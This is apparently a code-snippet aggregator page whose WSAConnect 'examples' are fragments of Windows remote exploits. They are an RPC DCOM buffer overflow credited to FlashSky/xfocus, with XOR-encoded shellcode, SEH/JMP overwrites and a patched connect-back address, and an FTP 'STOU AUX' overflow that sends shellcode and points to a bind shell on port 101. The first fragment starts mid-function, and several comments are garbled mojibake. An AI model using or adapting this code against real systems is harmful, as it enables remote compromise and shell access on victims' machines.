memcpy(sc+36,jmpesp_cn_sp4,sizeof(jmpesp_cn_sp4));
else if (atoi(argv[4])==2)
memcpy(sc+36,jmpesp_en_xp_sp1,sizeof(jmpesp_en_xp_sp1));


    if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
    {
        printf("WSAStartup error.Error:%d\n",WSAGetLastError());
        return;
    }

    addr_in.sin_family=AF_INET;
    addr_in.sin_port=htons(port);
    addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);

    if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
    {
        printf("Socket failed.Error:%d\n",WSAGetLastError());
        return;
    }
    if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
    {
        printf("Connect failed.Error:%d",WSAGetLastError());
        return;
    }
    port1 = htons(atoi(argv[3]));
    port1 ^= 0x9393;
    cb=inet_addr(argv[2]);
    cb ^= 0x93939393;
    *(unsigned short *)&sc[330+0x30] = port1;
    *(unsigned int *)&sc[335+0x30] = cb;
    len=sizeof(sc);
    memcpy(buf2,request1,sizeof(request1));
    len1=sizeof(request1);
    *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sc)/2;
    *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sc)/2;
    memcpy(buf2+len1,request2,sizeof(request2));
    len1=len1+sizeof(request2);
    memcpy(buf2+len1,sc,sizeof(sc));
    len1=len1+sizeof(sc);
    memcpy(buf2+len1,request3,sizeof(request3));
    len1=len1+sizeof(request3);
    memcpy(buf2+len1,request4,sizeof(request4));
    len1=len1+sizeof(request4);
    *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+sizeof(sc)-0xc;

    *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+sizeof(sc)-0xc;
    if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
    {
            printf("Send failed.Error:%d\n",WSAGetLastError());
            return;
    }

    len=recv(sock,buf1,1000,NULL);
    if (send(sock,buf2,len1,0)==SOCKET_ERROR)
    {
            printf("Send failed.Error:%d\n",WSAGetLastError());
            return;
    }
    len=recv(sock,buf1,1024,NULL);
}
Пример #23
0
int				_connect(T_SOCKET s, struct sockaddr *sock)
{
	return (WSAConnect(s, sock, sizeof(struct sockaddr), NULL, NULL, NULL, NULL));
}
Пример #24
0
int attack(char *ip1,bool atack) 
{ 
unsigned char rawData[1036]; 
memcpy(rawData,rawData1,1036); 
unsigned char shellcode[50000]; 
char ip[200]; 
strcpy(ip,ip1); 
WSADATA WSAData; 
SOCKET sock; 
int len,len1; 
SOCKADDR_IN addr_in; 
short port=135; 
unsigned char buf1[50000]; 
unsigned char buf2[50000]; 

printf("%s\n",ip); 
//printf("RPC DCOM overflow Vulnerability discoveried by NSFOCUS\n"); 
//printf("Code by FlashSky,Flashsky xfocus org\n"); 
//printf("Welcome to our Site: http://www.xfocus.org\n"); 
//printf("Welcome to our Site: http://www.venustech.com.cn\n"); 
/* if(argc!=3) 
{ 
printf("%s targetIP targetOS\ntargets:\n",argv[0]); 
for(int i=0;i<sizeof(target_os)/sizeof(v);i++) 
printf("%d - %s\n",i,target_os.target); 
printf("\n%x\n",GETSTRCS(argv[1])); 
return; 
} 
*/ 
/* if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0) 
{ 
printf("WSAStartup error.Error:%d\n",WSAGetLastError()); 
return; 
} 
*/ 
addr_in.sin_family=AF_INET; 
addr_in.sin_port=htons(port); 
addr_in.sin_addr.S_un.S_addr=inet_addr(ip); 

if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET) 
{ 
printf("Socket failed.Error:%d\n",WSAGetLastError()); 
return 0; 
} 
len1=sizeof(request1); 

len=sizeof(rawData); 

if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR) 
{ 
printf("%s - connect failed\n",ip); 
return 0; 
} 

int vers=!version(ip,sock); 

// printf("%d\n",vers); 
// return; 
// int vers=1; 

FILE *fp; 

//ç¨â ¥¬ ¯ ª¥â 
// fp=fopen("shellcode","rb"); 
// fread(rawData,1,1036,fp); 
// fclose(fp); 
//⥯¥àì ­ã¦­® ááç¨â âì ­¥¯®á।á⢥­­® ¨á¯®«­ï¥¬ë© 襫«ª®¤! 

fp=fopen("bshell2","rb"); 
int sz=fread(shellcode,1,1024,fp); 
fclose(fp); 
// printf("%d\n",sz); 
for(int i=0;i<sz;i++) 
rawData[i+0x71]=shellcode[i]; 
// fp=fopen("badfile.exe","rb"); 
// unsigned int sz1=fread(shellcode,1,50000,fp); 
// fclose(fp); 
// for(i=0;i<sz1;i++) 
// rawData[i+0x240]=shellcode; 

// fp=fopen("pac","wb"); 
// fwrite(rawData,1,1036,fp); 
// fclose(fp); 

// return; 


//¥à¥¤ ⥬ ª ª ªá®à¨âì § ¯¨è¥¬  ¤à¥á ᢮¡®¤­®£® HEAP'a 
// DWORD heap=0x00180000; 
// int k=vers; 
// vers=1; 
// *(DWORD *)(rawData+0xae)=target_os[vers].heap; 
*(DWORD *)(rawData+0x71+0x1e)=target_os[vers].heap; 
//’¥¯¥àì ­ã¦­® ¯à®ªá®à¨âì ­ è ª®¤, ¤«ï ⮣® çâ®¡ë ¯®«ãç¨âì ­ã¦­ë© ­  
XOR(rawData,0x71,sz,0x99); 
// XOR(rawData,0x240,sz1,0x99); 
//’ ª ¦¥ ­ ¬ ­ã¦­® § ¯¨á âì ­ã¦­ë© ­ ¬ SEH ¨ JMP 
DWORD seh=target_os[vers].seh; 
DWORD jmp=target_os[vers].jmp; 
*(DWORD *)(rawData+0x22a)=jmp; 
*(DWORD *)(rawData+0x22e)=seh; 
// *(WORD *)(rawData+0x62)=sz+sz1+(0x240-(0x71+sz)); 
*(WORD *)(rawData+0x62)=sz; 


memcpy(buf2,request1,sizeof(request1)); 
*(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(rawData)/2; 
*(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(rawData)/2; 
memcpy(buf2+len1,request2,sizeof(request2)); 
len1=len1+sizeof(request2); 

memcpy(buf2+len1,rawData,sizeof(rawData)); 
len1=len1+sizeof(rawData); 

memcpy(buf2+len1,request3,sizeof(request3)); 
len1=len1+sizeof(request3); 
memcpy(buf2+len1,request4,sizeof(request4)); 
len1=len1+sizeof(request4); 
*(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+len-0xc; 

*(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+len-0xc; 
*(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+len-0xc; 
*(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+len-0xc; 
*(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+len-0xc; 
*(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+len-0xc; 
*(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+len-0xc; 
*(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+len-0xc; 

closesocket(sock); 
if(atack) 
{ 
sock=socket(2,1,0); 
WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL); 

if (send(sock,(const char *)bindstr,sizeof(bindstr),0)==SOCKET_ERROR) 
{ 
printf("%s - send failed %d\n",ip,WSAGetLastError()); 
return 0; 
} 
else {printf("%s - send exploit to %s\n",ip,target_os[vers].target);} 

len=recv(sock,(char *)buf1,1000,NULL); 
bool ft=1; 
if(ft) 
{ 
int i=0; 
while(1) 
{ 
if (send(sock,(const char *)buf2,len1,0)==SOCKET_ERROR) 
{ 
printf("\nSend failed.Error:%d\n",WSAGetLastError()); 
return 0; 
} 
else 
{ 
printf("\r%d",++i); 
} 
//Sleep(1000); 
} 
} 
send(sock,(const char *)buf2,len1,0); 
closesocket(sock); 
} 
else fprintf(fp1,"%s %s\n",target_os[vers].target,ip); 
// fp=fopen("pac","wb"); 
// fwrite(rawData,1,1036,fp); 
// fclose(fp); 
} 
Пример #25
0
int main(int argc,char *argv[])
{
        ver();
        if ((argc<5)||(argc>6)||(atoi(argv[1])<1)||(atoi(argv[1])>2)){usage(argv[0]);return -1;}
        if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){cout<<"[+] wsastartup error: "<<WSAGetLastError()<<endl;return -1;}
        char *login=argv[2], *passwd=argv[3], data[10], recvbuf2[100], recvbuf[100], rootbuf[100], logbuf[100], logbuf2[100], pdbuf[100], pdbuf2[100];
        int ip=htonl(inet_addr(argv[4])), sz, a, sizeA, lgth, port;
        if (argc==6){port=atoi(argv[5]);}
        else port=21;
        char *os;
        if (atoi(argv[1]) == 1){os="Win2k based system";}
        if (atoi(argv[1]) == 1){os="Win2k based system";}
        if (atoi(argv[1]) == 2){os="WinXP based system";}
        if (atoi(argv[1]) == 2){os="WinXP based system";}
        SOCKET s;
        struct fd_set mask;
        struct timeval timeout;
        struct sockaddr_in server;
        s=socket(AF_INET,SOCK_STREAM,0);
        if (s==INVALID_SOCKET){ cout<<"[+] socket() error: "<<WSAGetLastError()<<endl;WSACleanup();return -1;}
        cout<<"[+] target: "<<os<<endl;
        server.sin_family=AF_INET;
        server.sin_addr.s_addr=htonl(ip);
        server.sin_port=htons(port);
        WSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL);
        timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
        switch(select(s+1,NULL,&mask,NULL,&timeout))
        {
                case -1: {cout<<"[+] select() error: "<<WSAGetLastError()<<endl;closesocket(s);return -1;}
                case 0: {cout<<"[+] connect() error: "<<WSAGetLastError()<<endl;closesocket(s);return -1;}
                default:
                if(FD_ISSET(s,&mask))
                {
                        cout<<"[+] connected, login in process..."<<endl;
                        Sleep(100);recv(s,recvbuf2,100,0);
                        if (!strstr(recvbuf2,"220")){cout<<"[+] this is not an ftp server, quitting..."<<endl;return -1;}
                        strcpy(logbuf,"USER ");strcpy(logbuf2,login);strcpy(pdbuf,"PASS ");strcpy(pdbuf2,passwd);strcpy(rootbuf,"STOU AUX");strcpy(data,"\r\n");
                        if (send(s,logbuf,strlen(logbuf),0)==SOCKET_ERROR) { cout<<"[+] Error during the login processus, check the ftp."<<endl;return -1;}
                        if (send(s,logbuf2,strlen(logbuf2),0)==SOCKET_ERROR) { cout<<"[+] Error during the login processus, check the ftp."<<endl;return -1;}
                        if (send(s,data,strlen(data),0)==SOCKET_ERROR) { cout<<"[+] Error during the login processus, check the ftp."<<endl;return -1;}
                        Sleep(1000);
                        if (send(s,pdbuf,strlen(pdbuf),0)==SOCKET_ERROR) { cout<<"[+] Error during the login processus, check the ftp."<<endl;return -1;}
                        if (send(s,pdbuf2,strlen(pdbuf2),0)==SOCKET_ERROR) { cout<<"[+] Error during the login processus, check the ftp."<<endl;return -1;}
                        if (send(s,data,strlen(data),0)==SOCKET_ERROR) { cout<<"[+] Error during the login processus, check the ftp."<<endl;return -1;}
                        Sleep(1000);
                        if (recv(s,recvbuf,200,0)==SOCKET_ERROR){ cout<<"[+] Error during the login processus, check the ftp."<<endl;return -1;}
                        if (strstr(recvbuf,"530")){ cout<<"[+] wrong login or passwd"<<endl;return -1;}
                        cout<<"[+] login success!"<<endl;Sleep(1000);cout<<"[+] sending the exploit string"<<endl;
                        if (atoi(argv[1]) == 1){lgth=500+1;}
                        if (atoi(argv[1]) == 2){lgth=498+1;}
                        sizeA=lgth-sizeof(scode);
                        sz=(sizeA-1)+sizeof(scode)+10;
                        memset(payload,0,sizeof(payload));
                        strcat(payload,cmd);strcat(payload,"\x41\x41\x41");
                        strcat(payload,scode);
                        for (a=0;a<sizeA;a++){strcat(payload,"\x41");}
                        strcat(payload,call);
                        strcat(payload,"\r\n");
                        Sleep(1000);
                    if (send(s,payload,strlen(payload),0)==SOCKET_ERROR) { cout<<"[+] sending error, the server prolly rebooted."<<endl;return -1;}
                        if (send(s,data,strlen(data),0)==SOCKET_ERROR) { cout<<"[+] sending error, the server prolly rebooted."<<endl;return -1;}
                        Sleep(1000);
                        cout<<"[+] size of payload: "<<sz<<endl;
                        cout<<"[+] payload send, connect the port 101 to get a shell."<<endl;
                        return 0;
                }
        }
        closesocket(s);
        WSACleanup();
        return 0;
}